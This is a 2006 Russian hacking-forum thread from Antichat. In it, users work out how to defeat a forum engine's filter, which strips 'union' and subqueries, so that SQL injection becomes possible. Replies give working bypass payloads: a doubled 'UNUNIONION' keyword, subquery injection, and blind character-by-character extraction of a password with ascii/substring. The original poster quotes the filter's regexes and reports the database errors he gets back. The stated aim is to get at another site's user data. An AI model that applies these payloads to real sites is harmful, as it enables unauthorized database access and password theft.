Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
sql injection without union |
07.04.2006, 02:29
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
sql injection without union
смотрел я на днях движок одного форума, там из запросов вырезается слово Union =(
что-нибудь можно придумать ?
__________________
md5( icq ) : fd7d5666e3329c168c41dc355c046d22
|
|
|
07.04.2006, 10:07
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496
Репутация:
519
|
|
Ну это смотря как вырезается. Попробуй вот так:
SELECT field1, field2, ...., fieldn from table1 UNUNIONION SELECT 1, 2, ...., n from table2
|
|
|
|
07.04.2006, 10:26
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
а можно ошарашить движок подзапросами
например такого вида:
seclet pass from users where id=-1+and(select+pass)
или путем посиволного перебора пароля
seclet pass from users where id=1+and+(id=2)+and+(ascii(substring(pass,0,1))<10 0)
|
|
|
|
07.04.2006, 13:40
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
ну перебор - это не то чего бы хотелось 
вложенные запросы тоже режутся
вот так вот это происходит:
preg_match('~(^|[^a-z])union($|[^[a-z])~s',$sql)
preg_match('~\([^)]*?select~s',$sql)
естественно запрос идёт не к таблице с юзерами =(
__________________
md5( icq ) : fd7d5666e3329c168c41dc355c046d22
|
|
|
|
07.04.2006, 13:43
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от Deem3n®
Ну это смотря как вырезается. Попробуй вот так:
SELECT field1, field2, ...., fieldn from table1 UNUNIONION SELECT 1, 2, ...., n from table2
не, там сообщение об ошибке выводиться ...
__________________
md5( icq ) : fd7d5666e3329c168c41dc355c046d22
|
|
|
|
07.04.2006, 14:40
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
попробуй разный регистр  |
|
|
|
07.04.2006, 15:21
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от k1b0rg
попробуй разный регистр там все в нижний переводиться ...
__________________
md5( icq ) : fd7d5666e3329c168c41dc355c046d22
|
|
|
|
07.04.2006, 15:29
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
а если использовать and(mysql.pass='123')
|
|
|
|
07.04.2006, 16:06
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Unknown column 'mysql.user.pass' in 'where clause'
даже еслиб работало , толку немного от этого 
__________________
md5( icq ) : fd7d5666e3329c168c41dc355c046d22
Последний раз редактировалось Майор; 07.04.2006 в 16:10..
|
|
|
|
07.04.2006, 16:17
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Unknown column 'mysql.user.pass' in 'where clause'
толк есть, значит подзапросы работают, а я тебе код дал для примера, а подставлять нада свои значения
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
